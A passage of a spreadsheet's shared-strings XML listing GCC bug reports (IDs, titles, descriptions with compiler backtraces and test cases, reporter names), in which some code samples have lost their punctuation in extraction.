  enum foo {bar=0 baz=1}
}
class B {
}
class C: public A {
public:
  void choke(foo) {}
}</t>
  </si>
  <si>
    <t>malte.starostik</t>
  </si>
  <si>
    <t>GCC-8759</t>
  </si>
  <si>
    <t>java.beans.Introspector has no flushCaches() or flushFromCaches() methods</t>
  </si>
  <si>
    <t>java.beans.Introspector has no flushCaches() or flushFromCaches() methods.
Release:
gcc-3.2
Environment:
Red Hat Linux 8.0</t>
  </si>
  <si>
    <t>GCC-42093</t>
  </si>
  <si>
    <t>[4.5 regression] Compressed switch tables for Thumb2 have signed offsets</t>
  </si>
  <si>
    <t>trunk 20091117 configured with
--with-arch=armv7-a --with-mode=thumb --with-float=softfp --with-fpu=vfp
hangs in the stage2 run of build/gengtype with 100% cpu time
attaching to the running process:
(gdb) bt
#0  0x00029fb4 in ?? ()
#1  0x0000a4a8 in walk_type ()
#2  0x0000a4a8 in walk_type ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>GCC-39041</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE on valid during vrp2</t>
  </si>
  <si>
    <t>The attached file causes an ICE with gcc-4.3.2 and gcc-4.3.3 on at least two targets (ix86 Linux and Blackfin) when compiled with -O2.
bug.i: In function 'foo':
bug.i:18: internal compiler error: in get_addr_dereference_operands at tree-ssa-operands.c:1698
This happens during the vrp2 pass:
bernds@beaker /local/blackfin/b-4.3/gcc $ tail bug.i.115t.vrp2 
prephitmp.29_38: [0 1]
SMT.36_57: VARYING
Substituing values and folding statements
Folded statement: pretmp.28_29 = *D.1312_16
            into: pretmp.28_29 = *</t>
  </si>
  <si>
    <t>GCC-1321</t>
  </si>
  <si>
    <t>wrong error message when trying to access outer field from inner static class</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Fixed in the current cvs tree:
    $ gcj -c LinkedList.java 
    LinkedList.java: In class `LinkedList$Iter':
    LinkedList.java: In method `LinkedList$Iter()':
    LinkedList.java:5: Can't make a static reference to nonstatic variable `modCount' in class `LinkedList$Iter'.
                          int dumb = modCount
                                     ^
    1 error
</t>
  </si>
  <si>
    <t>GCC-71440</t>
  </si>
  <si>
    <t>ICE on invalid C++ code in instantiate_type at cp/class.c:8247</t>
  </si>
  <si>
    <t xml:space="preserve">The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It seems to also affect all earlier versions since at least 4.6.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160606 (experimental) [trunk revision 237117] (GCC) 
$ 
$ g++-trunk -c small.cpp
small.cpp: In instantiation of â€˜void C::bar() [with T = int]â€™:
small.cpp:19:16:   required from here
small.cpp:15:10: error: cannot call constructor â€˜A::Aâ€™ directly
     B &lt;  // should be: B &lt; 
          ^
small.cpp:15:17: internal compiler error: in instantiate_type at cp/class.c:8247
     B &lt;  // should be: B &lt; 
                 ^
0x73a7a0 instantiate_type(tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/class.c:8244
0x6e526b convert_nontype_argument
	../../gcc-source-trunk/gcc/cp/pt.c:6628
0x6ebcc3 convert_template_argument
	../../gcc-source-trunk/gcc/cp/pt.c:7269
0x6f72eb coerce_template_parms
	../../gcc-source-trunk/gcc/cp/pt.c:7730
0x6fa04a lookup_template_class_1
	../../gcc-source-trunk/gcc/cp/pt.c:8313
0x6fa04a lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
	../../gcc-source-trunk/gcc/cp/pt.c:8654
0x6fd88b tsubst_aggr_type
	../../gcc-source-trunk/gcc/cp/pt.c:11437
0x6e6b77 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:12908
0x6ee2e7 tsubst_decl
	../../gcc-source-trunk/gcc/cp/pt.c:12324
0x6e6f7e tsubst(tree_node* tree_node* int tree_node*)
	../../gcc-source-trunk/gcc/cp/pt.c:12829
0x6d4227 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15174
0x6d4b30 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc-source-trunk/gcc/cp/pt.c:15303
0x6d1535 instantiate_decl(tree_node* int bool)
	../../gcc-source-trunk/gcc/cp/pt.c:22033
0x71e0f2 instantiate_pending_templates(int)
	../../gcc-source-trunk/gcc/cp/pt.c:22152
0x7611d7 c_parse_final_cleanups()
	../../gcc-source-trunk/gcc/cp/decl2.c:4600
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------------------
struct A 
{
  void f () {}
}
typedef void (A::*Ptr) ()
template  struct B {}
template  
struct C : public A
{
  void bar ()
  {
    B &lt;  // should be: B &lt; 
  } 
}
template class C </t>
  </si>
  <si>
    <t>GCC-48502</t>
  </si>
  <si>
    <t>os_test.TestStartProcess FAILs on Solaris 2</t>
  </si>
  <si>
    <t>The libgo os test recently started failing again on Solaris 2:
--- FAIL: os_test.TestStartProcess (0.03 seconds)
	exec pwd pwd returned /usr/bin\n wanted /bin\n
FAIL
FAIL: os
/vol/gcc/src/hg/trunk/local/libgo/testsuite/gotest[384]: gotest-timeout: cannot create [No such file or directory]
This is no wonder since /bin is a symlink to /usr/bin on all releases of
Solaris 2.</t>
  </si>
  <si>
    <t>GCC-1967</t>
  </si>
  <si>
    <t>bits/localefwd.h incorrectly uses int instead of size_t in for loop.</t>
  </si>
  <si>
    <t>One of the for-loops in bits/localefwd.h uses an int counter
in a comparison with a size_t static class member thereby
producing warning.
Release:
gcc_3_0_branch as of 20010212
Environment:
N/A
How-To-Repeat:
Use the locale template constructor that takes a facet
instance as its second argument.</t>
  </si>
  <si>
    <t>GCC-51529</t>
  </si>
  <si>
    <t>[OOP] gfortran.dg/class_to_type_1.f03 is miscompiled: Uninitialized variable used</t>
  </si>
  <si>
    <t>$ gfortran -g gfortran.dg/class_to_type_1.f03
$ MALLOC_PERTURB_= ./a.out
$ MALLOC_PERTURB_=33 ./a.out
A fatal error occurred! Backtrace for this error:
...
#6  0x400929 in __copy_MAIN___T2 at class_to_type_1.f03:5
#7  0x4013D1 in MAIN__ at class_to_type_1.f03:17
That's a typical sign for code which requires that malloc returns '\0'-set memory i.e. gfortran generates code which uses an uninitialized variable.</t>
  </si>
  <si>
    <t>GCC-66635</t>
  </si>
  <si>
    <t>g++ ICE when compiling constexpr code with comma operator</t>
  </si>
  <si>
    <t>Use of the comma operator in constexpr environment causes ICE in g++ 5.1.0. The following test case triggers the bug:
--- Begin test case ---
#include 
struct Foo {
    constexpr Foo(const unsigned i) : val(i) {}
    constexpr Foo operator-(const Foo &amp;rhs) const {
        return assert(val &gt;= rhs.val) Foo(val - rhs.val)
    }
    unsigned val
}
constexpr Foo foo(Foo(1) - Foo(2))
--- End test case ---
I have been able to reproduce the bug on both Linux and MacOS for gcc version 5.1.0. A colleague tested this using trunk yesterday and the error still seems to be present. g++ version 4.9.1 does not seem to suffer from this bug.
This seems to be closely related to bug 54777.</t>
  </si>
  <si>
    <t>GCC-53084</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] GCC cannot handle array initialization of string constant with point arithmetic properly</t>
  </si>
  <si>
    <t>Consider the following code:
#include 
int main() {
static const char *const aa[] = {foo+1}
printf(aa[0] = %s\naa[0])
return 0
}
 works fine on GCC 4.5.2 and 4.6.1
C:\work&gt;gcc --version
gcc (tdm-1) 4.5.2
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
C:\work&gt;gcc a.c -oa.exe
C:\work&gt;a
aa[0] = oo
C:\work&gt;gcc --version
gcc (tdm-1) 4.6.1
Copyright (C) 2011 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
C:\work&gt;gcc a.c -oa.exe
C:\work&gt;a
aa[0] = oo
On GCC 4.7.0 it fails with segmentation fault.
C:\work&gt;gcc --version
gcc (GCC) 4.7.0
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
C:\work&gt;gcc a.c -oa.exe
C:\work&gt;a
(error dialog)
Please go there to find the original bug threads: 
http://bugs.ruby-lang.org/issues/6333</t>
  </si>
  <si>
    <t>GCC-70409</t>
  </si>
  <si>
    <t>Silent truncation of character parameters with len=huge()</t>
  </si>
  <si>
    <t>Related to/derived from pr68441.
The following code demonstrates a strange behavior of character parameter
declarations if the len argument involves huge().
  integer parameter :: huge_1 = huge(0_1)
  character(    huge_1      ) parameter :: x = 'abc'
  character(    huge(0_1)   ) parameter :: y = 'abc'
  character(    huge(0_1)+0 ) parameter :: z = 'abcdef'
  character(    huge(0_1)   )            :: a = 'abc'
  integer parameter :: huge_2 = huge(0_2)
  character(    huge_2      ) parameter :: u = 'abc'
  character(    huge(0_2)   ) parameter :: v = 'abc'
  character(int(huge(0_2)4)) parameter :: w = 'abcdef'
  character(    huge(0_2)   )            :: b = 'abc'
  print* huge_1 len(x) len(y) len(z) len (a)
  print* huge_2 len(u) len(v) len(w) len (b)
end
Output for 4.6 .. 6.0 trunk:
         127         127           3           6         127
       32767       32767           3           6       32767
Expected: all numbers should be 127 in the first line 32767 in the second.</t>
  </si>
  <si>
    <t>GCC-25550</t>
  </si>
  <si>
    <t>file data corrupted after reading end of file</t>
  </si>
  <si>
    <t>After the end of file is read the file data is corrupted -
[dranta:~/tests/gfortran-D] dir% gfortran -o write17 write17.f
[dranta:~/tests/gfortran-D] dir% write17
   538976288
Abort
[dranta:~/tests/gfortran-D] dir% cat write17.f
      integer data
      data=-1
      open(unit=11status='scratch'form='unformatted')
       write(11)data
       read(11end=        1000 )data
 1000  continue
       rewind 11
       read(11end=        1001 )data
 1001  continue
       if(data.ne.-1)then
          write(6*)data
          call abort
       endif
       close(11)
       end</t>
  </si>
  <si>
    <t>GCC-8325</t>
  </si>
  <si>
    <t>[mainline regression] ICE in cp_expr_size at cp/cp-lang.c:307</t>
  </si>
  <si>
    <t xml:space="preserve">When compiled with optimization the enclosed preprocessed file causes a ICE.
This occurs with a native NetBSD/i386 compiler as well as the QNX/i386 port
I am working on.
Release:
3.3 20021023 (experimental)
Environment:
System: NetBSD orac 1.5ZA NetBSD 1.5ZA (GENERIC) #0: Sat May 25 18:17:52 PDT 2002 jtc@orac:/home/jtc/netbsd/NetBSD-current/syssrc/sys/arch/i386/compile/GENERIC i386
host: i386-unknown-netbsdelf1.5ZA
build: i386-unknown-netbsdelf1.5ZA
target: i386-unknown-netbsdelf1.5ZA
configured with: ../configure --enable-languages=cc++
How-To-Repeat:
gcc -O2 -c ex.ii
See attachments for ex.ii.gz
</t>
  </si>
  <si>
    <t>jtc</t>
  </si>
  <si>
    <t>GCC-58392</t>
  </si>
  <si>
    <t>internal compiler error: in expand_GOMP_SIMD_VF at internal-fn.c (omp simd inside omp parallel)</t>
  </si>
  <si>
    <t>Created attachment 30797
log file describe above
gomp_4.0-branch up to date
gcc -O2 -ftree-vectorize -fopenmp -std=c99 -funroll-loops --param max-unroll-times=4  -ffast-math -march=native -c -x c -v s3110.i &gt; build.log 2&gt;&amp; 1
default backtrace in attached build.log.  Unable to find compatible glib-debuginfo rpm for current installation.</t>
  </si>
  <si>
    <t>GCC-2300</t>
  </si>
  <si>
    <t>gcc_AC_C_FLOAT_FORMAT failed</t>
  </si>
  <si>
    <t>../gcc/configure:
....
checking floating point format... configure: error: Unknown floating point format
Configure in /export/home/ask/build/gcc-build/gcc failed exiting.
gcc/config.log finished with:
configure:1857: checking execution character set
configure:1908: checking floating point format
configure:1935: gcc -c -g -O2  conftest.c 1&gt;&amp;5
conftest.o is in the attachment but I guess the problem
is because of grep on binary file.
`man grep' said about it:
NOTES
  /usr/xpg4/bin/grep
     The results are unspecified if  input  files  contain  lines
     longer than LINE_MAX bytes or contain binary data.  LINE_MAX
     is defined in /usr/include/limits.a.
Release:
3.1 20010316 (CVS)
Environment:
SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10
gcc version 2.95.2 19991024 (release)</t>
  </si>
  <si>
    <t>GCC-60101</t>
  </si>
  <si>
    <t>[4.7 Regression] Long compile times when mixed complex floating point datatypes are used in lengthy expressions</t>
  </si>
  <si>
    <t>Created attachment 32071
Archive which includes test case.
In the example I copied below the double.c file compiles instantly whereas the float.c file takes very long. This is a truncated version of an even longer file (more lines of code in the loop) and the compile time for the float.c file grows like N^3 where N is the number of lines. Here is the output of the long version for 4.8.2:
0x40ae17 do_spec_1
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5269
0x40ae17 do_spec_1
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5269
0x40c875 process_brace_body
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5872
0x40c875 process_brace_body
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5872
0x40c875 handle_braces
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5786
0x40c875 handle_braces
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5786
0x40ae17 do_spec_1
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5269
0x40c875 process_brace_body
	../../gcc-4.8.2-src/gcc-4.8.2/gcc/gcc.c:5872
and more messages like that
The attached files both compile but they the float.c takes significantly longer.
The only difference between those files is that the temporary variable sum is double complex in the working version and float complex in the non-working version. So I guess the compiler tries to reorganize the complex multiplications and additions so that intermediate floating point results can be used (this is what I guess). Both files compile using the icc (&gt;=11.0) and clang/LLVM almost instantly. It also works for gcc&lt;=4.4.</t>
  </si>
  <si>
    <t>thorstenkurth</t>
  </si>
  <si>
    <t>GCC-27088</t>
  </si>
  <si>
    <t>[4.2 regression] Segfault with inlining producing negative shift count</t>
  </si>
  <si>
    <t>falk@juist:/tmp% cat min4.c      
inline unsigned length() {
    return 0
}
unsigned add_new_phrase() {
    return 16 / (1 &lt;&lt; (length() - 1))
}
falk@juist:/tmp% gcc -c min4.c   
falk@juist:/tmp% gcc -c -O min4.c
min4.c: In function 'add_new_phrase':
min4.c:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
No problem with 4.1.0 or earlier.
    Falk</t>
  </si>
  <si>
    <t>GCC-60455</t>
  </si>
  <si>
    <t>Imprecise column number of -Woverflow in array initializers</t>
  </si>
  <si>
    <t>$: cat s.c 
char a[] = {0xFFFF 4 0xFFFF}
$: gcc-trunk -c s.c 
s.c:1:1: warning: overflow in implicit constant conversion [-Woverflow]
 char a[] = {0xFFFF 4 0xFFFF}
 ^
s.c:1:1: warning: overflow in implicit constant conversion [-Woverflow]
$: gcc-trunk --version
gcc (GCC) 4.9.0 20140306 (experimental)
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-917</t>
  </si>
  <si>
    <t>Build failed</t>
  </si>
  <si>
    <t>I get gcc from cvs today run
../gcc/configure --prefix=/usr/local/gcc --enable-shared &amp;&amp;  make CFLAGS='-O2' LIBCFLAGS='-g -O2' LIBCXXFLAGS='-g -O2 -fno-implicit-templates' bootstrap
from separate directory and get:
...
Text relocation remains                         referenced
    against symbol                  offset      in file
__objc_class_name_Object            0x0         .libs/NXConstStr.o
__objc_class_name_Object            0x1c        .libs/linking.o
__objc_class_name_Object            0x0         .libs/Protocol.o
__objc_class_name_NXConstantString  0x20        .libs/linking.o
ld: fatal: relocations remain against allocatable but non-writable sections
collect2: ld returned 1 exit status
make[2]: *** [libobjc.la] Error 1
make[2]: Leaving directory `/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libobjc'
make[1]: *** [all-target-libobjc] Error 2
make[1]: Leaving directory `/export/home/ask/build/gcc-build'
make: *** [bootstrap] Error 2
Release:
Nov 28 16:19:10 IST 2000 from cvs
Environment:
SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
My compiler is gcc version 2.95.2 19991024 (release)</t>
  </si>
  <si>
    <t>GCC-57018</t>
  </si>
  <si>
    <t>[4.8 Regression] Miscompilation of bison 2.7.1 under -Os -fomit-frame-pointer</t>
  </si>
  <si>
    <t>Created attachment 29906
Code to generate a pair of objects showing the bug
GCC 4.8.0 miscompiles bison 2.7.1 when compiling for space with frame pointer omission.  (I've built gcc with --enable-frame-pointer expressly so my code isn't bloated with exception data when I omit it on the command line.)
There are multiple breakages but I've nailed down one of them in the attached case.  It seems to involve the combination of passing structures by value and the optimization opportunities of functions not called from outside an object.
So long as extenal_noop does nothing calling real_entry_point should always result in its argument being copied to main_blob.  But main_blob is full of garbage at the problematic optimization -Os -fomit-frame-pointer.
This is on i386-pc-linux-uclibc.</t>
  </si>
  <si>
    <t>GCC-20775</t>
  </si>
  <si>
    <t>Crash in libgcj.so on linux alpha</t>
  </si>
  <si>
    <t>gij crashes in GC
I am not sure which component to report this bug against.
I did some investigations and I got to the boehm-gc.
I checked the latest CVS gcc4_0-branch and tried to make check in
boehm-gc directory. The test crashed too.
# gij --version
gij (GNU libgcj) version 3.4.3 20050221 (Red Hat 3.4.3-20)
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# gdb /usr/bin/gij
GNU gdb Red Hat Linux (6.3.0.0-1.6rh)
Copyright 2004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alpha-redhat-linux-gnu...
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(gdb) r org.eclipse.jdt.internal.compiler.batch.Main -bootclasspath
/usr/share/java/libgcj-3.4.3.jar Test.java
Starting program: /usr/bin/gij org.eclipse.jdt.internal.compiler.batch.Main
-bootclasspath /usr/share/java/libgcj-3.4.3.jar Test.java
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 2199023381872 (LWP 8734)]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 2199023381872 (LWP 8734)]
0x0000020000b8f0a8 in GC_push_all_eager () from /usr/lib/libgcj.so.5
(gdb) bt
#0  0x0000020000b8f0a8 in GC_push_all_eager () from /usr/lib/libgcj.so.5
#1  0x0000020000b8f148 in GC_push_all_stack () from /usr/lib/libgcj.so.5
#2  0x0000020000b99960 in GC_push_all_stacks () from /usr/lib/libgcj.so.5
#3  0x0000020000b933d8 in GC_default_push_other_roots ()
   from /usr/lib/libgcj.so.5
#4  0x0000020000b90cbc in GC_push_roots () from /usr/lib/libgcj.so.5
#5  0x0000020000b8fcec in GC_mark_some () from /usr/lib/libgcj.so.5
#6  0x0000020000b84a88 in GC_stopped_mark () from /usr/lib/libgcj.so.5
#7  0x0000020000b85704 in GC_try_to_collect_inner () from /usr/lib/libgcj.so.5
#8  0x0000020000b91f68 in GC_init_inner () from /usr/lib/libgcj.so.5
#9  0x0000020000b92260 in GC_init () from /usr/lib/libgcj.so.5
#10 0x0000020000b8a58c in GC_init_gcj_malloc () from /usr/lib/libgcj.so.5
#11 0x0000020000b81a08 in _Jv_InitGC () from /usr/lib/libgcj.so.5
#12 0x00000200007dfd10 in _Jv_CreateJavaVM () from /usr/lib/libgcj.so.5
#13 0x00000200007e01a4 in _Jv_RunMain () from /usr/lib/libgcj.so.5
#14 0x0000000120000e54 in ?? ()
#15 0x0000020001139284 in __libc_start_main () from /lib/tls/libc.so.6.1
#16 0x0000000120000b78 in ?? ()
Previous frame inner to this frame (corrupt stack?)
(gdb)  
Test in boehm-gc.
[root@falcon gc]# make check
Making check in include
make[1]: Entering directory `/opt/gcc/build/gc/include'
make[1]: Nothing to be done for `check'.
make[1]: Leaving directory `/opt/gcc/build/gc/include'
make[1]: Entering directory `/opt/gcc/build/gc'
gcc -DHAVE_CONFIG_H -I. -I../../boehm-gc -I./include -I./include 
-I/opt/gcc/boehm-gc/include  -fexceptions -Iinclude -I././targ-include
-I.//libc/include -g -O0 -c -o tests/test.o ../../boehm-gc/tests/test.c
/bin/sh ./libtool --mode=link gcc -fexceptions -Iinclude -I././targ-include
-I.//libc/include -g -O0  -o gctest -shared-libgcc tests/test.o ./libgcjgc.la
-lpthread -ldl
gcc -fexceptions -Iinclude -I././targ-include -I.//libc/include -g -O0 -o
.libs/gctest -shared-libgcc tests/test.o  ./.libs/libgcjgc.so -lpthread -ldl
-Wl--rpath -Wl/usr/local/lib
creating gctest
make AR_FLAGS= CC_FOR_BUILD= CFLAGS=-g -O0 CXXFLAGS=-g -O0
CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET= INSTALL=/usr/bin/install -c
INSTALL_DATA=/usr/bin/install -c -m 644 INSTALL_PROGRAM=/usr/bin/install -c
INSTALL_SCRIPT=/usr/bin/install -c LDFLAGS= LIBCFLAGS=
LIBCFLAGS_FOR_TARGET= MAKE=make MAKEINFO=/bin/sh /opt/gcc/missing --run
makeinfo   PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT=
RUNTEST= RUNTESTFLAGS= exec_prefix=/usr/local infodir=/usr/local/info
libdir=/usr/local/lib prefix=/usr/local tooldir=AR=ar AS=as CC=gcc
CXX=g++ LD=ld LIBCFLAGS= NM= PICFLAG= RANLIB=ranlib DESTDIR=
check-TESTS
make[2]: Entering directory `/opt/gcc/build/gc'
Segfault at 0x11fc04248
Unexpected bus error or segmentation fault
/bin/sh: line 1: 18963 Aborted                 LD_LIBRARY_PATH=../../gcc ${dir}$tst
FAIL: gctest
===================
1 of 1 tests failed
===================
make[2]: *** [check-TESTS] Error 1
make[2]: Leaving directory `/opt/gcc/build/gc'
make[1]: *** [check-am] Error 2
make[1]: Leaving directory `/opt/gcc/build/gc'
make: *** [check-recursive] Error 1
[root@falcon gc]# LD_LIBRARY_PATH=.libs/ gdb .libs/gctest
GNU gdb Red Hat Linux (6.3.0.0-1.6rh)
Copyright 2004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alpha-redhat-linux-gnu...Using host libthread_db
library /lib/tls/libthread_db.so.1.
(gdb) r
Starting program: /opt/gcc/build/gc/.libs/gctest
[Thread debugging using libthread_db enabled]
[New Thread 2199023380176 (LWP 18989)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 2199023380176 (LWP 18989)]
0x0000020000049be0 in GC_mark_from (mark_stack_top=0x20000276090
    mark_stack=0x20000276000 mark_stack_limit=0x20000296000)
    at ../../boehm-gc/mark.c:759
759               deferred = *limit
(gdb) bt
#0  0x0000020000049be0 in GC_mark_from (mark_stack_top=0x20000276090
    mark_stack=0x20000276000 mark_stack_limit=0x20000296000)
    at ../../boehm-gc/mark.c:759
#1  0x0000020000049188 in GC_mark_some (cold_gc_frame=0x11fa596c8 )
    at ../../boehm-gc/mark.c:361
#2  0x000002000003e39c in GC_stopped_mark (
    stop_func=0x2000003d4cc ) at ../../boehm-gc/alloc.c:518
#3  0x000002000003dd8c in GC_try_to_collect_inner (
    stop_func=0x2000003d4cc ) at ../../boehm-gc/alloc.c:365
#4  0x000002000004e418 in GC_init_inner () at ../../boehm-gc/misc.c:783
#5  0x000002000004e4c8 in GC_enable_incremental () at ../../boehm-gc/misc.c:822
#6  0x00000001200051a8 in main () at ../../boehm-gc/tests/test.c:1805
(gdb)</t>
  </si>
  <si>
    <t>GCC-20460</t>
  </si>
  <si>
    <t>Nasty extensions that should always warn</t>
  </si>
  <si>
    <t>Currently we accept all language extensions as GFC_STD_GNU but some are so
ugly that they should give a warning by default.  List them here:
- REAL DO loop indices
- REAL array indices</t>
  </si>
  <si>
    <t>GCC-32969</t>
  </si>
  <si>
    <t>(rr)?spacing give wrong answers with -fdefault-integer-8</t>
  </si>
  <si>
    <t>With -fdefault-integer-8 the following code:
program test_rrspacing
  real x
  x = 3.0
  x = rrspacing(x)
  print * x spacing(x) spacing(3.0)
  x = 3.0
  x = spacing(x)
  print * x
end
gives:
  0.7500000      1.6777216E+07  2.3841858E-07
  1.6777216E+07
instead of
  1.2582912E+07   1.000000      2.3841858E-07
  2.3841858E-07
Note that like PR32933 the code does not involve directly integers and as in the original test of PR32770 it seems to be linked to bigendian platforms (PPC here).</t>
  </si>
  <si>
    <t>GCC-16211</t>
  </si>
  <si>
    <t>If mixing templates and va_list (va_arg) and char* string you wont be happy</t>
  </si>
  <si>
    <t>I hope I do not offend anyone but this code seems to segfault. Im not even sure
what this form wants as host triplet. I read the guidlines and got the picture
that you do not want source but I cant explain this any other way. Well here
goes hope Ill not make a total fool of myself.
The crash comes from an invalid address returned by va_arg( ). Undefine CRASH to
see it work as expected.
gcc version 3.3 20030226 (prerelease) (SuSE Linux)
------------ Code snipet ---------------
#include  //	va_list
#include 
#define CRASH
void func( const char *str... )
#ifdef CRASH
template bool FormTest( const char* strchar* i )
{
	func( stri )
	return true
}
#else
bool FormTest( const char* strchar* i )
{
	func( stri )
	return true
}
#endif
int main( void )
{
#ifdef CRASH
	FormTest( %s\nstring )
#else
	FormTest( %s\nstring )
#endif
}
void func( const char *strva_list 
void func( const char *str... )
{
	va_list ap va_start( apstr )
	func( strap )
	va_end( ap )
}
void func( const char *strva_list &amp;ap )
{
	const char *pek int i
	pek=va_arg( apconst char* ) printf( strpek )
}</t>
  </si>
  <si>
    <t>netletter</t>
  </si>
  <si>
    <t>GCC-26982</t>
  </si>
  <si>
    <t>g++.old-deja/g++.other/init19.C execution test fails</t>
  </si>
  <si>
    <t>FAIL: g++.old-deja/g++.other/init19.C execution test
is present on platforms including hppa2.0w-hp-hpux11.11 hppa64-hp-hpux11.11 ia64-hp-hpux11.23.  It looks like this test depends on __cxa_atexit being used and so should be conditioned on an appropriate effective-target for __cxa_atexit.</t>
  </si>
  <si>
    <t>GCC-79005</t>
  </si>
  <si>
    <t>Use of a captured variable within nested generic lambdas provokes internal compiler error.</t>
  </si>
  <si>
    <t>Created attachment 40468
Preprocessed file generated via -save-temps</t>
  </si>
  <si>
    <t>mmccutcheon</t>
  </si>
  <si>
    <t>GCC-23903</t>
  </si>
  <si>
    <t>Duplicate dump file numbers</t>
  </si>
  <si>
    <t>We are now emitting duplicate dump file numbers:
file.c.t10.cleanup_cfg
file.c.t10.lower
This started happening after Paolo's pass reorg.  He agreed to look at this.</t>
  </si>
  <si>
    <t>GCC-41239</t>
  </si>
  <si>
    <t>Scheduler reorders division by zero before a call that might not return</t>
  </si>
  <si>
    <t>This testcase distilled from postgresql fails at runtime on s390x-linux with -O2 -march=z9-109 -mtune=z10:
/* { dg-do run } */
/* { dg-options -O2 } */
/* { dg-options -O2 -march=z9-109 -mtune=z10 { target s390x-linux } } */
struct S
{
  short nargs
  unsigned long arg[2]
}
extern void abort (void)
extern void exit (int)
extern char errstart (int const char * int const char * const char *)
extern void errfinish (int ...)
extern int errcode (int)
extern int errmsg (const char *fmt ...) __attribute__ ((format (printf 1 2)))
unsigned long
test (struct S *x)
{
  signed int arg1 = x-&gt;arg[0]
  long int arg2 = x-&gt;arg[1]
  if (arg2 == 0)
    (errstart (20 int8.c 924 __func__ ((void *) 0))
     ? (errfinish (errcode (0x2040082) errmsg (division by zero)))
     : (void) 0)
  return (long int) arg1 / arg2
}
int
main (void)
{
  struct S s = { 2 { 5 0 } }
  test (
  abort ()
}
__attribute__((noinline)) char
errstart (int x const char *y int z const char *w const char *v)
{
  asm volatile ( : +r (x) : r (y) r (z) r (w) r (v) : memory)
  return x
}
__attribute__((noinline)) int
errcode (int x)
{
  asm volatile ( : +r (x) : : memory)
  return x
}
__attribute__((noinline)) int
errmsg (const char *x ...)
{
  asm volatile ( : +r (x) : : memory)
  return *x
}
__attribute__((noinline)) void
errfinish (int x ...)
{
  asm volatile ( : +r (x) : : memory)
  if (x)
    /* Could be a longjmp or throw too.  */
    exit (0)
}
The problem is that 2nd scheduler pass reorders the division before some of the calls.  If the calls were guaranteed to return that would be fine the program would crash sooner or later but as shown in the testcase the call can not return (exit longjmp throw) and in that case whether the division is scheduled before or after the call matters.</t>
  </si>
  <si>
    <t>GCC-71306</t>
  </si>
  <si>
    <t>bogus -Wplacement-new with an array element</t>
  </si>
  <si>
    <t>As reported in the following post:
  https://gcc.gnu.org/ml/gcc-help/2016-05/msg00113.html
the -Wplacement-new warning introduced in GCC 6.1 issues a false positive on the following test case.  It seems to treat the array element as if it was the array itself.
$ cat zz.cpp &amp;&amp; /build/gcc-6-branch/gcc/xgcc -B /build/gcc-6-branch/gcc -S -Wall -Wextra zz.cpp
void* operator new (__SIZE_TYPE__ void *p) { return p }
struct S { char c [32] } *p [2]
void f ()
{
  new (p [0]) S
}
zz.cpp: In function â€˜void f()â€™:
zz.cpp:7:12: warning: placement new constructing an object of type â€˜Sâ€™ and size â€˜32â€™ in a region of type â€˜S* [2]â€™ and size â€˜16â€™ [-Wplacement-new=]
   new (p [0]) S
        ~~~~^</t>
  </si>
  <si>
    <t>GCC-82518</t>
  </si>
  <si>
    <t>gfortran.fortran-torture/execute/in-pack.f90 fails on armeb</t>
  </si>
  <si>
    <t>I have noticed that since r252917
